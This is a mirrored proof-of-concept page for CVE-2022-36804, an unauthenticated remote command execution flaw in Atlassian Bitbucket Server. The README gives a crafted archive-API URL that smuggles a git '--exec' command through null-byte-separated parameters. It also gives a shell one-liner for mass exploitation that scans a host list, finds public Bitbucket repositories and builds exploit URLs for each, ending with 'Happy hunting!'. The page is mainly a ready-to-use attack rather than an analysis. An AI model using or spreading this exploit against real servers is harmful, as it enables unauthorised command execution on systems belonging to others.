CVE-2022-36804 PoC — Atlassian Bitbucket Server 安全漏洞

Source

Associated Vulnerability

Description

Bitbucket CVE-2022-36804 unauthenticated remote command execution

Readme

# CVE-2022-36804-POC 🕷️
Bitbucket CVE-2022-36804 unauthenticated remote command execution

## Exploitation

Find publicly visible repositories - example.com/repos?visibility=public

`/rest/api/latest/projects/{project-path}/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin`


## Mass Exploitation
``
 for url in $(cat hosts.txt | httpx -follow-redirects -title -path /repos?visibility=public -match-string "repository-container" -threads 9500 | grep Bitbucket |awk '{print $1}');do echo $url|sed 's/\/repos?visibility=public//g'|tr -d \\n;curl -s -k "$url" | grep -Po '(/projects/)(?!.*\1).*'|grep -o "/projects/.*/browse"|sed 's/browse//g'|awk '{print "/rest/api/latest"$1"archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin"}';done
``

Visit crafted URLs :)

Happy hunting! 🐺

[Twitter](https://twitter.com/milanshiftsec)

[LinkedIn](https://www.linkedin.com/in/milan-jovic-sec/)

File Snapshot

 [4.0K]  /data/pocs/f73f707b7313cdd1d795924178c02f3fe9e78da4
├── [1.0K]  CVE-2022-36804.py
├── [1.0K]  LICENSE
└── [ 967]  README.md

0 directories, 3 files

Remarks